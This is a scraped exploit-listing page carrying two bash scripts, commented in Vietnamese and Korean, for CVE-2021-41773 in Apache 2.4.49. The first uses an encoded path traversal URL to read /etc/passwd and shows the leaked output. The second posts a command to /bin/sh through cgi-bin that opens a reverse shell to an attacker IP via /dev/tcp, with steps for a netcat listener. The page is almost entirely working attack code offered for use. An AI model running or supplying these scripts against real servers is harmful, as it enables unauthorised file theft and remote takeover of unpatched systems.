## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KHAIDTRAIVCH-CVE-2021-41773-APACHE-2.4.49-
# CVE-2021-41773-Apache-2.4.49-
침투 테스트
1.1. Path Traversal (/etc/passwd 파일 읽기) #!/bin/bash
# Script: exploit_path_traversal.sh
# Mục tiêu: Đọc tệp /etc/passwd từ Apache 2.4.49
TARGET_IP="128.0.0.100" URL="http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
echo "[+] Khai thác Path Traversal trên Apache 2.4.49..." curl -s "$URL" | head -n 5 # Hiển thị 5 dòng đầu của /etc/passwd
# Kết quả demo:
$ ./exploit_path_traversal.sh [+] Khai thác Path Traversal trên Apache 2.4.49... root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync
1.2. Remote Code Execution (Reverse Shell) #!/bin/bash
# Script: exploit_apache_rce.sh
# Mục tiêu: Thực thi lệnh reverse shell qua CGI
TARGET_IP="128.0.0.100" ATTACKER_IP="192.168.0.101" PORT="4444"
echo "[+] Gửi reverse shell đến $ATTACKER_IP:$PORT..." curl -X POST
"http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
-H "Content-Type: application/x-www-form-urlencoded"
-d "echo; bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$PORT 0>&1'"
# 사용 방법:
# 1.Netcat을 열어 리스닝:
nc -lvnp 4444
# 2\. 스크립트 실행:
./exploit_apache_rce.sh